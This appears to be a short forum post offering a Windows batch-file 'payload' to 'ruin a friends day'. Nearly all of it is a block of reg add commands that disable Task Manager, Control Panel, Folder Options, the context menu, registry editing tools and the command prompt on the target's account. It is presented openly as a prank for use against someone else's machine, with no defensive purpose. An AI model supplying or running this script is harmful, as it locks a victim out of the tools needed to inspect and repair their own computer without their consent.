This annoying thing is nothing more than a simple list of payloads you could stick in a .bat file to ruin a friends day. 
Batch Script Payloads
-------------------------

Batch Script Payloads
-------------------------
Code:
@echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoControlPanel /t REG_DWORD /d 00000001 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoFolderOptions /t REG_DWORD /d 00000001 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoViewContextMenu /t REG_DWORD /d 00000001 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableRegistryTools /t REG_DWORD /d 00000001 reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002


